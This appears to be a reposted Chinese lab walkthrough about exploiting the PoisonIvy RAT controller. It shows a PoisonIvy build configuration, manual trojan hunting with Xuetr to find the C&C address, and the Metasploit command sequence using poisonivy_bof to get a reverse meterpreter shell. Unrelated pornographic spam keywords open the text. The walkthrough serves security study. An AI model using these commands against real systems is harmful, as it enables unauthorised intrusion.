欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

PoisonIvy Rat 遠程溢出實戰(zhàn)

  發(fā)布時間:2012-07-09 16:50:44   作者:佚名   我要評論
這個Exploit已經(jīng)集成在最新版本的Msf中了,老外的文章里也有源文件,可以修改后單獨提出來.
From&thx2:
http://badishi.com/poison-ivy-exploit-metasploit-module/
https://twitter.com/badishi
這個Exploit已經(jīng)集成在最新版本的Msf中了,老外的文章里也有源文件,可以修改后單獨提出來.
 
首先為了模擬完整的環(huán)境,第一步是抓到已經(jīng)成為肉雞的電腦上反向連接的IP,這里順便介紹下簡單ARK工具的使用及手工查馬的方法吧.
PI的反向連接配置,這里填的靜態(tài)IP

啟動項及釋放目錄等,同時設(shè)定的插默認(rèn)瀏覽器和svchost.exe.

完整的配置信息如下:
- Connection
Connect to: 92.168.124.134:3460:0,
ID: test
Group:
Password: admin
Connect through proxy: No
- Install
ActiveX Startup: Yes
ActiveX Key: {344D13DD-52AF-DD3F-2A33-ED4792414430}
Copy File: Yes
File Name: svchost.exe
Copy File To: System Folder
Melt File: Yes
- Advanced
Process Mutex: )!VoqA.I4
Inject Server: Yes
Persistence: No
Inject into running process: Yes
Inject into: svchost.exe
Key Logger: No
Format: PE
File Alignment: 512
- Build
Icon: No
Execute Third-party Applications: No
在DEMO機器中運行,然后上線了.

DEMO機器中手工用Xuetr查殺,手工查殺木馬的方法,對于Ring3層下的無非就是可疑進程,可疑連接,可疑DLL模塊,可疑啟動項(服務(wù)),等等這些了.這里直接參考建立的網(wǎng)絡(luò)連接.都能看到這里并沒有打開IE卻有了IE的進程,并且是已經(jīng)連接的狀態(tài)了.于是得到C&C的IP地址.

 
請出Msf黑火星的神器.

msf>search poisonivy
找到exp位置
msf>use /exploit/windows/misc/poisonivy_bof
設(shè)定使用exp
msf>show options
查看下設(shè)定,只要設(shè)定下遠程IP(C&C服務(wù)器)地址就可以了.
msf>set RHOST 192.168.124.134
檢查下是否存在漏洞
msf>check
ok.. just exploit it!
msf>exploit
默認(rèn)會返回一個反連的meterpreter會話.

最后.測試了下全補丁版本的Windows 2k3 enterprise,可能因為DEP和ALSR技術(shù)的原因,沒有完全bypass具體的原因沒有深入下去了.

相關(guān)文章

最新評論